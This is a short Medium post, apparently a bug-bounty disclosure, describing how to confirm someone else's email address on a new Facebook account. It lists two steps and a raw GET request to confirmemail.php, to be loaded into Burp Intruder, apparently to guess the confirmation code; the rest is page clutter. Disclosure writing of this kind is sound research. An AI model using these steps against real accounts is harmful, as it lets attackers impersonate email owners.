Confirming any new Email Address bug in Facebook (Part-4)

https://m.facebook.com/confirmemail.php?e=victim@mail.com@&c=15579&report=1&message=1
  1. Create any New Facebook Account with Victim’s Email Address.
  2. Open Burp Suite and paste the below request in Intruder.
GET /confirmemail.php?e=redacted@email.com&c=12345&report=1&message=1 HTTP/1.1Host: m.facebook.comConnection: closeUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: c_user=0; xs=0;

--

--

--

Web Security Researcher

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Assessing Risks in DeFi

Prada enters Web3 with NFT and Discord server launch

Free Fire codes on April 2, 2022; All free rewards

Automate Secure Score using Power Automate

QMware hybrid cloud data centre

Rigel Protocol April Updates

The General Data Protection Regulation: What Internet Retailers Need to Know

Installing IP Cameras or How I started monitoring my cats

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Lokesh Kumar

Lokesh Kumar

Web Security Researcher

More from Medium

IDOR vulnerability on invoice and weak password reset leads to account take over

My first Google HOF

google HoF

2fa Bypass by changing Request method to DELETE

Insecure Deserialization — FAQ